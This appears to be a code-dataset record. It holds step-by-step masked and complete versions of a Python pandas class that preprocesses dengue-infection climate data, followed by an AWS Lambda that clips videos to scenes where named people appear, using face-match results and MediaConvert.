"step-1": "<mask token>\n\n\nclass DengueInfection(BasedDataset):\n <mask token>\n\n def cyclic_encoder(self, col, max_val):\n self.df[col + '_sin'] = np.sin(2 * np.pi * self.df[col] / max_val)\n self.df[col + '_cos'] = np.cos(2 * np.pi * self.df[col] / max_val)\n return self.df\n\n def fill_nan(self, col):\n table = pd.pivot_table(self.df, values=col, index=['year', 'month'],\n columns=['city'], aggfunc=np.mean)\n self.df[col + '_no_nans'] = self.df[col]\n for index, row in self.df.iterrows():\n if math.isnan(row[col]):\n query = table.query(\n f'year == \"{row[\\'year\\']}\" & month ==\"{row[\\'month\\']}\"'\n ).reset_index()\n city = row['city']\n value = query[city]\n if value.empty:\n value = self.df.loc[self.df['year'] == row['year']][col\n ].mean()\n self.df.loc[index, [col + '_no_nans']] = value\n continue\n self.df.loc[index, [col + '_no_nans']] = value[0]\n <mask token>\n <mask token>\n\n def week_split(self):\n self.df['week_split'] = self.df['weekofyear'].apply(lambda x: 0 if \n x < 25 else 1)\n\n def season_of_date(date):\n year = str(date.year)\n seasons = {'spring': pd.date_range(start='21/03/' + year, end=\n '20/06/' + year), 'summer': pd.date_range(start='21/06/' + year,\n end='22/09/' + year), 'autumn': pd.date_range(start='23/09/' +\n year, end='20/12/' + year)}\n if date in seasons['spring']:\n return 'spring'\n if date in seasons['summer']:\n return 'summer'\n if date in seasons['autumn']:\n return 'autumn'\n else:\n return 'winter'\n\n def kelvin_to_celsius(self, kelvin):\n if kelvin is None:\n return kelvin\n return kelvin - 273.15\n <mask token>\n\n def week_of_year(self):\n pass\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def ncep_avg_temp_k(self):\n self.df['NCEP_avg_temp_c'] = self.df['NCEP_avg_temp_k'].apply(lambda\n k: self.kelvin_to_celsius(kelvin=k))\n self.fill_nan(col='NCEP_avg_temp_c')\n <mask token>\n\n def ncep_max_air_temp_k(self):\n self.df['NCEP_max_air_temp_c'] = self.df['NCEP_max_air_temp_k'].apply(\n lambda k: self.kelvin_to_celsius(kelvin=k))\n self.fill_nan(col='NCEP_max_air_temp_c')\n\n def ncep_min_air_temp_k(self):\n self.df['NCEP_min_air_temp_c'] = self.df['NCEP_min_air_temp_k'].apply(\n lambda k: self.kelvin_to_celsius(kelvin=k))\n self.fill_nan(col='NCEP_min_air_temp_c')\n <mask token>\n <mask token>\n\n def ncep_precip_mm(self):\n self.fill_nan(col='NCEP_precip_mm')\n\n def ncep_humidity_g_per_kg(self):\n self.fill_nan(col='NCEP_humidity_g_per_kg')\n\n def ncep_diur_temp_rng_k(self):\n self.df['NCEP_diur_temp_rng_c'] = self.df['NCEP_diur_temp_rng_k'\n ].apply(lambda k: self.kelvin_to_celsius(kelvin=k))\n self.fill_nan(col='NCEP_diur_temp_rng_c')\n\n def avg_temp_c(self):\n self.fill_nan(col='avg_temp_c')\n <mask token>\n <mask token>\n <mask token>\n\n def precip_mm(self):\n self.fill_nan(col='precip_mm')\n <mask token>\n\n def city(self):\n self.df = self.df[self.df['city'] != 'sj']\n",
"step-2": "<mask token>\n\n\nclass DengueInfection(BasedDataset):\n\n def __init__(self, cfg, development):\n super(DengueInfection, self).__init__(cfg=cfg, dataset_type=\n FileTypes.TSV, development=development)\n if development:\n self.total_cases()\n self.extract_month()\n self.extract_quarter()\n self.week_start_date()\n self.city()\n self.cyclic_encoder(col='weekofyear', max_val=53)\n self.cyclic_encoder(col='month', max_val=12)\n self.persiann_precip_mm()\n self.ncep_avg_temp_k()\n self.ncep_diur_temp_rng_k()\n self.ncep_max_air_temp_k()\n self.ncep_min_air_temp_k()\n self.ncep_air_temp_k()\n self.ncep_dew_point_temp_k()\n self.avg_temp_c()\n self.diur_temp_rng_c()\n self.max_temp_c()\n self.min_temp_c()\n self.precip_mm()\n\n def cyclic_encoder(self, col, max_val):\n self.df[col + '_sin'] = np.sin(2 * np.pi * self.df[col] / max_val)\n self.df[col + '_cos'] = np.cos(2 * np.pi * self.df[col] / max_val)\n return self.df\n\n def fill_nan(self, col):\n table = pd.pivot_table(self.df, values=col, index=['year', 'month'],\n columns=['city'], aggfunc=np.mean)\n self.df[col + '_no_nans'] = self.df[col]\n for index, row in self.df.iterrows():\n if math.isnan(row[col]):\n query = table.query(\n f'year == \"{row[\\'year\\']}\" & month ==\"{row[\\'month\\']}\"'\n ).reset_index()\n city = row['city']\n value = query[city]\n if value.empty:\n value = self.df.loc[self.df['year'] == row['year']][col\n ].mean()\n self.df.loc[index, [col + '_no_nans']] = value\n continue\n self.df.loc[index, [col + '_no_nans']] = value[0]\n <mask token>\n <mask token>\n\n def week_split(self):\n self.df['week_split'] = self.df['weekofyear'].apply(lambda x: 0 if \n x < 25 else 1)\n\n def season_of_date(date):\n year = str(date.year)\n seasons = {'spring': pd.date_range(start='21/03/' + year, end=\n '20/06/' + year), 'summer': pd.date_range(start='21/06/' + year,\n end='22/09/' + year), 'autumn': pd.date_range(start='23/09/' +\n year, end='20/12/' + year)}\n if date in seasons['spring']:\n return 'spring'\n if date in seasons['summer']:\n return 'summer'\n if date in seasons['autumn']:\n return 'autumn'\n else:\n return 'winter'\n\n def kelvin_to_celsius(self, kelvin):\n if kelvin is None:\n return kelvin\n return kelvin - 273.15\n <mask token>\n\n def week_of_year(self):\n pass\n <mask token>\n <mask token>\n <mask token>\n\n def ncep_air_temp_k(self):\n self.df['NCEP_air_temp_c'] = self.df['NCEP_air_temp_k'].apply(lambda\n k: self.kelvin_to_celsius(kelvin=k))\n self.fill_nan(col='NCEP_air_temp_c')\n\n def ncep_avg_temp_k(self):\n self.df['NCEP_avg_temp_c'] = self.df['NCEP_avg_temp_k'].apply(lambda\n k: self.kelvin_to_celsius(kelvin=k))\n self.fill_nan(col='NCEP_avg_temp_c')\n <mask token>\n\n def ncep_max_air_temp_k(self):\n self.df['NCEP_max_air_temp_c'] = self.df['NCEP_max_air_temp_k'].apply(\n lambda k: self.kelvin_to_celsius(kelvin=k))\n self.fill_nan(col='NCEP_max_air_temp_c')\n\n def ncep_min_air_temp_k(self):\n self.df['NCEP_min_air_temp_c'] = self.df['NCEP_min_air_temp_k'].apply(\n lambda k: self.kelvin_to_celsius(kelvin=k))\n self.fill_nan(col='NCEP_min_air_temp_c')\n <mask token>\n <mask token>\n\n def ncep_precip_mm(self):\n self.fill_nan(col='NCEP_precip_mm')\n\n def ncep_humidity_g_per_kg(self):\n self.fill_nan(col='NCEP_humidity_g_per_kg')\n\n def ncep_diur_temp_rng_k(self):\n self.df['NCEP_diur_temp_rng_c'] = self.df['NCEP_diur_temp_rng_k'\n ].apply(lambda k: self.kelvin_to_celsius(kelvin=k))\n self.fill_nan(col='NCEP_diur_temp_rng_c')\n\n def avg_temp_c(self):\n self.fill_nan(col='avg_temp_c')\n <mask token>\n <mask token>\n <mask token>\n\n def precip_mm(self):\n self.fill_nan(col='precip_mm')\n <mask token>\n\n def city(self):\n self.df = self.df[self.df['city'] != 'sj']\n",
"step-3": "<mask token>\n\n\nclass DengueInfection(BasedDataset):\n\n def __init__(self, cfg, development):\n super(DengueInfection, self).__init__(cfg=cfg, dataset_type=\n FileTypes.TSV, development=development)\n if development:\n self.total_cases()\n self.extract_month()\n self.extract_quarter()\n self.week_start_date()\n self.city()\n self.cyclic_encoder(col='weekofyear', max_val=53)\n self.cyclic_encoder(col='month', max_val=12)\n self.persiann_precip_mm()\n self.ncep_avg_temp_k()\n self.ncep_diur_temp_rng_k()\n self.ncep_max_air_temp_k()\n self.ncep_min_air_temp_k()\n self.ncep_air_temp_k()\n self.ncep_dew_point_temp_k()\n self.avg_temp_c()\n self.diur_temp_rng_c()\n self.max_temp_c()\n self.min_temp_c()\n self.precip_mm()\n\n def cyclic_encoder(self, col, max_val):\n self.df[col + '_sin'] = np.sin(2 * np.pi * self.df[col] / max_val)\n self.df[col + '_cos'] = np.cos(2 * np.pi * self.df[col] / max_val)\n return self.df\n\n def fill_nan(self, col):\n table = pd.pivot_table(self.df, values=col, index=['year', 'month'],\n columns=['city'], aggfunc=np.mean)\n self.df[col + '_no_nans'] = self.df[col]\n for index, row in self.df.iterrows():\n if math.isnan(row[col]):\n query = table.query(\n f'year == \"{row[\\'year\\']}\" & month ==\"{row[\\'month\\']}\"'\n ).reset_index()\n city = row['city']\n value = query[city]\n if value.empty:\n value = self.df.loc[self.df['year'] == row['year']][col\n ].mean()\n self.df.loc[index, [col + '_no_nans']] = value\n continue\n self.df.loc[index, [col + '_no_nans']] = value[0]\n\n def extract_month(self):\n self.df['week_start_date'] = pd.to_datetime(self.df['week_start_date'])\n self.df['month'] = self.df['week_start_date'].dt.month\n <mask token>\n\n def week_split(self):\n self.df['week_split'] = self.df['weekofyear'].apply(lambda x: 0 if \n x < 25 else 1)\n\n def season_of_date(date):\n year = str(date.year)\n seasons = {'spring': pd.date_range(start='21/03/' + year, end=\n '20/06/' + year), 'summer': pd.date_range(start='21/06/' + year,\n end='22/09/' + year), 'autumn': pd.date_range(start='23/09/' +\n year, end='20/12/' + year)}\n if date in seasons['spring']:\n return 'spring'\n if date in seasons['summer']:\n return 'summer'\n if date in seasons['autumn']:\n return 'autumn'\n else:\n return 'winter'\n\n def kelvin_to_celsius(self, kelvin):\n if kelvin is None:\n return kelvin\n return kelvin - 273.15\n <mask token>\n\n def week_of_year(self):\n pass\n <mask token>\n <mask token>\n <mask token>\n\n def ncep_air_temp_k(self):\n self.df['NCEP_air_temp_c'] = self.df['NCEP_air_temp_k'].apply(lambda\n k: self.kelvin_to_celsius(kelvin=k))\n self.fill_nan(col='NCEP_air_temp_c')\n\n def ncep_avg_temp_k(self):\n self.df['NCEP_avg_temp_c'] = self.df['NCEP_avg_temp_k'].apply(lambda\n k: self.kelvin_to_celsius(kelvin=k))\n self.fill_nan(col='NCEP_avg_temp_c')\n\n def ncep_dew_point_temp_k(self):\n \"\"\"\n dew point temperature in Kelvin degrees measured by NCEP CFSR;\n :rtype: object\n \"\"\"\n self.df['NCEP_dew_point_temp_c'] = self.df['NCEP_dew_point_temp_k'\n ].apply(lambda k: self.kelvin_to_celsius(kelvin=k))\n self.fill_nan(col='NCEP_dew_point_temp_c')\n\n def ncep_max_air_temp_k(self):\n self.df['NCEP_max_air_temp_c'] = self.df['NCEP_max_air_temp_k'].apply(\n lambda k: self.kelvin_to_celsius(kelvin=k))\n self.fill_nan(col='NCEP_max_air_temp_c')\n\n def ncep_min_air_temp_k(self):\n self.df['NCEP_min_air_temp_c'] = self.df['NCEP_min_air_temp_k'].apply(\n lambda k: self.kelvin_to_celsius(kelvin=k))\n self.fill_nan(col='NCEP_min_air_temp_c')\n\n def ncep_precip_kg_per_m2(self):\n self.fill_nan(col='NCEP_precip_kg_per_m2')\n <mask token>\n\n def ncep_precip_mm(self):\n self.fill_nan(col='NCEP_precip_mm')\n\n def ncep_humidity_g_per_kg(self):\n self.fill_nan(col='NCEP_humidity_g_per_kg')\n\n def ncep_diur_temp_rng_k(self):\n self.df['NCEP_diur_temp_rng_c'] = self.df['NCEP_diur_temp_rng_k'\n ].apply(lambda k: self.kelvin_to_celsius(kelvin=k))\n self.fill_nan(col='NCEP_diur_temp_rng_c')\n\n def avg_temp_c(self):\n self.fill_nan(col='avg_temp_c')\n <mask token>\n <mask token>\n\n def min_temp_c(self):\n self.fill_nan(col='min_temp_c')\n\n def precip_mm(self):\n self.fill_nan(col='precip_mm')\n <mask token>\n\n def city(self):\n self.df = self.df[self.df['city'] != 'sj']\n",
"step-4": "<mask token>\n\n\nclass DengueInfection(BasedDataset):\n\n def __init__(self, cfg, development):\n super(DengueInfection, self).__init__(cfg=cfg, dataset_type=\n FileTypes.TSV, development=development)\n if development:\n self.total_cases()\n self.extract_month()\n self.extract_quarter()\n self.week_start_date()\n self.city()\n self.cyclic_encoder(col='weekofyear', max_val=53)\n self.cyclic_encoder(col='month', max_val=12)\n self.persiann_precip_mm()\n self.ncep_avg_temp_k()\n self.ncep_diur_temp_rng_k()\n self.ncep_max_air_temp_k()\n self.ncep_min_air_temp_k()\n self.ncep_air_temp_k()\n self.ncep_dew_point_temp_k()\n self.avg_temp_c()\n self.diur_temp_rng_c()\n self.max_temp_c()\n self.min_temp_c()\n self.precip_mm()\n\n def cyclic_encoder(self, col, max_val):\n self.df[col + '_sin'] = np.sin(2 * np.pi * self.df[col] / max_val)\n self.df[col + '_cos'] = np.cos(2 * np.pi * self.df[col] / max_val)\n return self.df\n\n def fill_nan(self, col):\n table = pd.pivot_table(self.df, values=col, index=['year', 'month'],\n columns=['city'], aggfunc=np.mean)\n self.df[col + '_no_nans'] = self.df[col]\n for index, row in self.df.iterrows():\n if math.isnan(row[col]):\n query = table.query(\n f'year == \"{row[\\'year\\']}\" & month ==\"{row[\\'month\\']}\"'\n ).reset_index()\n city = row['city']\n value = query[city]\n if value.empty:\n value = self.df.loc[self.df['year'] == row['year']][col\n ].mean()\n self.df.loc[index, [col + '_no_nans']] = value\n continue\n self.df.loc[index, [col + '_no_nans']] = value[0]\n\n def extract_month(self):\n self.df['week_start_date'] = pd.to_datetime(self.df['week_start_date'])\n self.df['month'] = self.df['week_start_date'].dt.month\n <mask token>\n\n def week_split(self):\n self.df['week_split'] = self.df['weekofyear'].apply(lambda x: 0 if \n x < 25 else 1)\n\n def season_of_date(date):\n year = str(date.year)\n seasons = {'spring': pd.date_range(start='21/03/' + year, end=\n '20/06/' + year), 'summer': pd.date_range(start='21/06/' + year,\n end='22/09/' + year), 'autumn': pd.date_range(start='23/09/' +\n year, end='20/12/' + year)}\n if date in seasons['spring']:\n return 'spring'\n if date in seasons['summer']:\n return 'summer'\n if date in seasons['autumn']:\n return 'autumn'\n else:\n return 'winter'\n\n def kelvin_to_celsius(self, kelvin):\n if kelvin is None:\n return kelvin\n return kelvin - 273.15\n <mask token>\n\n def week_of_year(self):\n pass\n <mask token>\n\n def six_month(self):\n self.df['six'] = self.df['month'].apply(lambda x: 1 if x > 6 else 0)\n\n def persiann_precip_mm(self):\n self.fill_nan(col='PERSIANN_precip_mm')\n\n def ncep_air_temp_k(self):\n self.df['NCEP_air_temp_c'] = self.df['NCEP_air_temp_k'].apply(lambda\n k: self.kelvin_to_celsius(kelvin=k))\n self.fill_nan(col='NCEP_air_temp_c')\n\n def ncep_avg_temp_k(self):\n self.df['NCEP_avg_temp_c'] = self.df['NCEP_avg_temp_k'].apply(lambda\n k: self.kelvin_to_celsius(kelvin=k))\n self.fill_nan(col='NCEP_avg_temp_c')\n\n def ncep_dew_point_temp_k(self):\n \"\"\"\n dew point temperature in Kelvin degrees measured by NCEP CFSR;\n :rtype: object\n \"\"\"\n self.df['NCEP_dew_point_temp_c'] = self.df['NCEP_dew_point_temp_k'\n ].apply(lambda k: self.kelvin_to_celsius(kelvin=k))\n self.fill_nan(col='NCEP_dew_point_temp_c')\n\n def ncep_max_air_temp_k(self):\n self.df['NCEP_max_air_temp_c'] = self.df['NCEP_max_air_temp_k'].apply(\n lambda k: self.kelvin_to_celsius(kelvin=k))\n self.fill_nan(col='NCEP_max_air_temp_c')\n\n def ncep_min_air_temp_k(self):\n self.df['NCEP_min_air_temp_c'] = self.df['NCEP_min_air_temp_k'].apply(\n lambda k: self.kelvin_to_celsius(kelvin=k))\n self.fill_nan(col='NCEP_min_air_temp_c')\n\n def ncep_precip_kg_per_m2(self):\n self.fill_nan(col='NCEP_precip_kg_per_m2')\n <mask token>\n\n def ncep_precip_mm(self):\n self.fill_nan(col='NCEP_precip_mm')\n\n def ncep_humidity_g_per_kg(self):\n self.fill_nan(col='NCEP_humidity_g_per_kg')\n\n def ncep_diur_temp_rng_k(self):\n self.df['NCEP_diur_temp_rng_c'] = self.df['NCEP_diur_temp_rng_k'\n ].apply(lambda k: self.kelvin_to_celsius(kelvin=k))\n self.fill_nan(col='NCEP_diur_temp_rng_c')\n\n def avg_temp_c(self):\n self.fill_nan(col='avg_temp_c')\n\n def diur_temp_rng_c(self):\n self.fill_nan(col='diur_temp_rng_c')\n <mask token>\n\n def min_temp_c(self):\n self.fill_nan(col='min_temp_c')\n\n def precip_mm(self):\n self.fill_nan(col='precip_mm')\n <mask token>\n\n def city(self):\n self.df = self.df[self.df['city'] != 'sj']\n",
"step-5": "# Copyright (c) 2021, Omid Erfanmanesh, All rights reserved.\n\n\nimport math\n\nimport numpy as np\nimport pandas as pd\n\nfrom data.based.based_dataset import BasedDataset\nfrom data.based.file_types import FileTypes\n\n\nclass DengueInfection(BasedDataset):\n def __init__(self, cfg, development):\n super(DengueInfection, self).__init__(cfg=cfg, dataset_type=FileTypes.TSV, development=development)\n\n if development:\n self.total_cases()\n self.extract_month()\n self.extract_quarter()\n self.week_start_date()\n # self.six_month()\n # self.week_split()\n self.city()\n self.cyclic_encoder(col='weekofyear',max_val=53)\n self.cyclic_encoder(col='month', max_val=12)\n self.persiann_precip_mm()\n\n self.ncep_avg_temp_k()\n self.ncep_diur_temp_rng_k()\n self.ncep_max_air_temp_k()\n self.ncep_min_air_temp_k()\n self.ncep_air_temp_k()\n self.ncep_dew_point_temp_k()\n\n self.avg_temp_c()\n self.diur_temp_rng_c()\n self.max_temp_c()\n self.min_temp_c()\n self.precip_mm()\n\n\n\n def cyclic_encoder(self, col, max_val):\n self.df[col + '_sin'] = np.sin(2 * np.pi * self.df[col] / max_val)\n self.df[col + '_cos'] = np.cos(2 * np.pi * self.df[col] / max_val)\n return self.df\n\n def fill_nan(self, col):\n table = pd.pivot_table(self.df, values=col, index=['year', 'month'],\n columns=['city'], aggfunc=np.mean)\n\n self.df[col + '_no_nans'] = self.df[col]\n\n for index, row in self.df.iterrows():\n if math.isnan(row[col]):\n query = table.query(f'year == \"{row[\"year\"]}\" & month ==\"{row[\"month\"]}\"').reset_index()\n city = row['city']\n value = query[city]\n\n if value.empty:\n value = self.df.loc[self.df['year'] == row[\"year\"]][col].mean()\n self.df.loc[index, [col + '_no_nans']] = value\n continue\n self.df.loc[index, [col + '_no_nans']] = value[0]\n\n def extract_month(self):\n self.df['week_start_date'] = pd.to_datetime(self.df['week_start_date'])\n self.df['month'] = self.df['week_start_date'].dt.month\n\n def extract_quarter(self):\n self.df['quarter'] = self.df['week_start_date'].dt.quarter\n\n def week_split(self):\n self.df['week_split'] = self.df['weekofyear'].apply(lambda x: 0 if x < 25 else 1)\n\n def season_of_date(date):\n year = str(date.year)\n seasons = {'spring': pd.date_range(start='21/03/' + year, end='20/06/' + year),\n 'summer': pd.date_range(start='21/06/' + year, end='22/09/' + year),\n 'autumn': pd.date_range(start='23/09/' + year, end='20/12/' + year)}\n if date in seasons['spring']:\n return 'spring'\n if date in seasons['summer']:\n return 'summer'\n if date in seasons['autumn']:\n return 'autumn'\n else:\n return 'winter'\n\n def kelvin_to_celsius(self, kelvin):\n if kelvin is None:\n return kelvin\n return kelvin - 273.15\n\n def year(self):\n pass\n\n def week_of_year(self):\n pass\n\n def week_start_date(self):\n pass\n\n def six_month(self):\n self.df['six'] = self.df['month'].apply(lambda x: 1 if x > 6 else 0)\n\n def persiann_precip_mm(self):\n self.fill_nan(col='PERSIANN_precip_mm')\n\n def ncep_air_temp_k(self):\n self.df['NCEP_air_temp_c'] = self.df['NCEP_air_temp_k'].apply(lambda k: self.kelvin_to_celsius(kelvin=k))\n self.fill_nan(col='NCEP_air_temp_c')\n\n def ncep_avg_temp_k(self):\n self.df['NCEP_avg_temp_c'] = self.df['NCEP_avg_temp_k'].apply(lambda k: self.kelvin_to_celsius(kelvin=k))\n self.fill_nan(col='NCEP_avg_temp_c')\n\n def ncep_dew_point_temp_k(self):\n \"\"\"\n dew point temperature in Kelvin degrees measured by NCEP CFSR;\n :rtype: object\n \"\"\"\n self.df['NCEP_dew_point_temp_c'] = self.df['NCEP_dew_point_temp_k'].apply(\n lambda k: self.kelvin_to_celsius(kelvin=k))\n self.fill_nan(col='NCEP_dew_point_temp_c')\n\n def ncep_max_air_temp_k(self):\n self.df['NCEP_max_air_temp_c'] = self.df['NCEP_max_air_temp_k'].apply(\n lambda k: self.kelvin_to_celsius(kelvin=k))\n self.fill_nan(col='NCEP_max_air_temp_c')\n\n def ncep_min_air_temp_k(self):\n self.df['NCEP_min_air_temp_c'] = self.df['NCEP_min_air_temp_k'].apply(\n lambda k: self.kelvin_to_celsius(kelvin=k))\n self.fill_nan(col='NCEP_min_air_temp_c')\n\n def ncep_precip_kg_per_m2(self):\n self.fill_nan(col='NCEP_precip_kg_per_m2')\n\n def ncep_humidity_percent(self):\n self.fill_nan(col='NCEP_humidity_percent')\n\n def ncep_precip_mm(self):\n self.fill_nan(col='NCEP_precip_mm')\n\n def ncep_humidity_g_per_kg(self):\n self.fill_nan(col='NCEP_humidity_g_per_kg')\n\n def ncep_diur_temp_rng_k(self):\n self.df['NCEP_diur_temp_rng_c'] = self.df['NCEP_diur_temp_rng_k'].apply(\n lambda k: self.kelvin_to_celsius(kelvin=k))\n self.fill_nan(col='NCEP_diur_temp_rng_c')\n\n def avg_temp_c(self):\n self.fill_nan(col='avg_temp_c')\n\n def diur_temp_rng_c(self):\n self.fill_nan(col='diur_temp_rng_c')\n\n def max_temp_c(self):\n self.fill_nan(col='max_temp_c')\n\n def min_temp_c(self):\n self.fill_nan(col='min_temp_c')\n\n def precip_mm(self):\n self.fill_nan(col='precip_mm')\n\n def total_cases(self):\n self.df = self.df[self.df['total_cases'] < 41]\n\n def city(self):\n self.df = self.df[self.df['city'] != 'sj']\n\n",
"step-ids": [
16,
18,
22,
25,
33
]
}
|
[
16,
18,
22,
25,
33
] |
import json
import boto3
import os
import datetime
regionName = os.environ['AWS_REGION']
BUCKET_PATH = os.environ['BUCKET_PATH']
SENSITIVIT = os.environ['SENSITIVIT']
s3_client = boto3.client('s3', region_name=regionName)
ddb_resource = boto3.resource('dynamodb', region_name=regionName)
def lambda_handler(event, context):
# body = json.loads(event['body'])
body = event
videoPath = str(body['videoPath'])
templatePath = str(body['templatePath'])
facePath = str(body['facePath'])
targetPeople = str(body['targetPeople'])
FACES_BUCKET = facePath.split('/')[2]
FACES_OBJECT = '/'.join(facePath.split('/')[3:])
s3_client.download_file(FACES_BUCKET, FACES_OBJECT, '/tmp/faces.json')
facesJson = open('/tmp/faces.json', 'r')
facesData = json.load(facesJson)
FRAME_RATE = int(facesData['VideoMetadata']['FrameRate'])
PEOPLE = targetPeople.split(',')
timeStamps = []
scenesTime = []
i = 0
while i < len(facesData['Persons']):
try:
for target in PEOPLE:
if facesData['Persons'][i]['FaceMatches'] == []:
pass
elif facesData['Persons'][i]['FaceMatches'][0]['Face']['ExternalImageId'] == target.strip():
timeStamps.append(facesData['Persons'][i]['Timestamp'])
except IndexError:
pass
i = i+1
timeCollection = [[timeStamps[0]]]
i = 1
j = 0
while i < len(timeStamps):
if timeStamps[i] - timeCollection[j][-1] <= 1000:
timeCollection[j].append(timeStamps[i])
i = i+1
else:
j = j+1
timeCollection.append([timeStamps[i]])
for collection in timeCollection:
if collection[-1] - collection[0] >= 1000:
if collection[0] % 1000 == 0:
start = datetime.datetime.utcfromtimestamp(collection[0]//1000).strftime("%H:%M:%S") + ':00'
elif int(collection[0] % 1000 / 1000 * FRAME_RATE) < 10:
start = datetime.datetime.utcfromtimestamp(collection[0] // 1000).strftime("%H:%M:%S") + ':0' + str(int(collection[0] % 1000 / 1000 * FRAME_RATE))
else:
start = datetime.datetime.utcfromtimestamp(collection[0]//1000).strftime("%H:%M:%S") + ':' + str(int(collection[0] % 1000 / 1000 * FRAME_RATE))
if collection[-1] % 1000 == 0:
end = datetime.datetime.utcfromtimestamp(collection[-1] // 1000).strftime("%H:%M:%S") + ':00'
elif int(collection[-1] % 1000 / 1000 * FRAME_RATE) < 10:
end = datetime.datetime.utcfromtimestamp(collection[-1] // 1000).strftime("%H:%M:%S") + ':0' + str(int(collection[-1] % 1000 / 1000 * FRAME_RATE))
else:
end = datetime.datetime.utcfromtimestamp(collection[-1] // 1000).strftime("%H:%M:%S") + ':' + str(int(collection[-1] % 1000 / 1000 * FRAME_RATE))
scenesTime.append((start,end))
else:
pass
JOB_BUCKET = templatePath.split('/')[2]
JOB_OBJECT = '/'.join(templatePath.split('/')[3:])
s3_client.download_file(JOB_BUCKET, JOB_OBJECT, '/tmp/job-template.json')
finalName = []
for people in PEOPLE:
finalName.append(people.strip())
OUTPUT_NAME = '-'+'-'.join(finalName)
with open('/tmp/job-template.json', 'r') as r:
template = json.load(r)
for scene in scenesTime:
template['Settings']['Inputs'][0]['InputClippings'].append({'StartTimecode': scene[0], 'EndTimecode': scene[-1]})
template['Settings']['Inputs'][0]['FileInput'] = videoPath
template['Settings']['OutputGroups'][0]['Outputs'][0]['NameModifier'] = OUTPUT_NAME
template['Settings']['OutputGroups'][0]['OutputGroupSettings']['FileGroupSettings']['Destination'] = BUCKET_PATH
with open('/tmp/job-all.json', 'w') as w:
json.dump(template, w, indent=2)
w.close()
r.close()
mediaconvert_client = boto3.client('mediaconvert', region_name=regionName)
response = mediaconvert_client.describe_endpoints(Mode='DEFAULT')
mediaURL = response['Endpoints'][0]['Url']
mediaconvert_client = boto3.client('mediaconvert',endpoint_url=mediaURL)
with open("/tmp/job-all.json", "r") as jsonfile:
job_object = json.load(jsonfile)
mediaconvert_client.create_job(**job_object)
output = {'videoPath': videoPath,
'templatePath': templatePath,
'facePath': facePath,
'targetPerson': targetPeople,
'Frame Rate': FRAME_RATE
}
return {
'statusCode': 200,
'body': json.dumps(output)
}
|
normal
|
{
"blob_id": "8c96c38a67c2eb97e30b325e4917ba4888731118",
"index": 7349,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef lambda_handler(event, context):\n body = event\n videoPath = str(body['videoPath'])\n templatePath = str(body['templatePath'])\n facePath = str(body['facePath'])\n targetPeople = str(body['targetPeople'])\n FACES_BUCKET = facePath.split('/')[2]\n FACES_OBJECT = '/'.join(facePath.split('/')[3:])\n s3_client.download_file(FACES_BUCKET, FACES_OBJECT, '/tmp/faces.json')\n facesJson = open('/tmp/faces.json', 'r')\n facesData = json.load(facesJson)\n FRAME_RATE = int(facesData['VideoMetadata']['FrameRate'])\n PEOPLE = targetPeople.split(',')\n timeStamps = []\n scenesTime = []\n i = 0\n while i < len(facesData['Persons']):\n try:\n for target in PEOPLE:\n if facesData['Persons'][i]['FaceMatches'] == []:\n pass\n elif facesData['Persons'][i]['FaceMatches'][0]['Face'][\n 'ExternalImageId'] == target.strip():\n timeStamps.append(facesData['Persons'][i]['Timestamp'])\n except IndexError:\n pass\n i = i + 1\n timeCollection = [[timeStamps[0]]]\n i = 1\n j = 0\n while i < len(timeStamps):\n if timeStamps[i] - timeCollection[j][-1] <= 1000:\n timeCollection[j].append(timeStamps[i])\n i = i + 1\n else:\n j = j + 1\n timeCollection.append([timeStamps[i]])\n for collection in timeCollection:\n if collection[-1] - collection[0] >= 1000:\n if collection[0] % 1000 == 0:\n start = datetime.datetime.utcfromtimestamp(collection[0] //\n 1000).strftime('%H:%M:%S') + ':00'\n elif int(collection[0] % 1000 / 1000 * FRAME_RATE) < 10:\n start = datetime.datetime.utcfromtimestamp(collection[0] //\n 1000).strftime('%H:%M:%S') + ':0' + str(int(collection[\n 0] % 1000 / 1000 * FRAME_RATE))\n else:\n start = datetime.datetime.utcfromtimestamp(collection[0] //\n 1000).strftime('%H:%M:%S') + ':' + str(int(collection[0\n ] % 1000 / 1000 * FRAME_RATE))\n if collection[-1] % 1000 == 0:\n end = datetime.datetime.utcfromtimestamp(collection[-1] // 1000\n ).strftime('%H:%M:%S') + ':00'\n elif int(collection[-1] % 1000 / 1000 * FRAME_RATE) < 10:\n end = datetime.datetime.utcfromtimestamp(collection[-1] // 1000\n ).strftime('%H:%M:%S') + ':0' + str(int(collection[-1] %\n 1000 / 1000 * FRAME_RATE))\n else:\n end = datetime.datetime.utcfromtimestamp(collection[-1] // 1000\n ).strftime('%H:%M:%S') + ':' + str(int(collection[-1] %\n 1000 / 1000 * FRAME_RATE))\n scenesTime.append((start, end))\n else:\n pass\n JOB_BUCKET = templatePath.split('/')[2]\n JOB_OBJECT = '/'.join(templatePath.split('/')[3:])\n s3_client.download_file(JOB_BUCKET, JOB_OBJECT, '/tmp/job-template.json')\n finalName = []\n for people in PEOPLE:\n finalName.append(people.strip())\n OUTPUT_NAME = '-' + '-'.join(finalName)\n with open('/tmp/job-template.json', 'r') as r:\n template = json.load(r)\n for scene in scenesTime:\n template['Settings']['Inputs'][0]['InputClippings'].append({\n 'StartTimecode': scene[0], 'EndTimecode': scene[-1]})\n template['Settings']['Inputs'][0]['FileInput'] = videoPath\n template['Settings']['OutputGroups'][0]['Outputs'][0]['NameModifier'\n ] = OUTPUT_NAME\n template['Settings']['OutputGroups'][0]['OutputGroupSettings'][\n 'FileGroupSettings']['Destination'] = BUCKET_PATH\n with open('/tmp/job-all.json', 'w') as w:\n json.dump(template, w, indent=2)\n w.close()\n r.close()\n mediaconvert_client = boto3.client('mediaconvert', region_name=regionName)\n response = mediaconvert_client.describe_endpoints(Mode='DEFAULT')\n mediaURL = response['Endpoints'][0]['Url']\n mediaconvert_client = boto3.client('mediaconvert', endpoint_url=mediaURL)\n with open('/tmp/job-all.json', 'r') as jsonfile:\n job_object = json.load(jsonfile)\n mediaconvert_client.create_job(**job_object)\n output = {'videoPath': videoPath, 'templatePath': templatePath,\n 'facePath': facePath, 'targetPerson': targetPeople, 'Frame Rate':\n FRAME_RATE}\n return {'statusCode': 200, 'body': json.dumps(output)}\n",
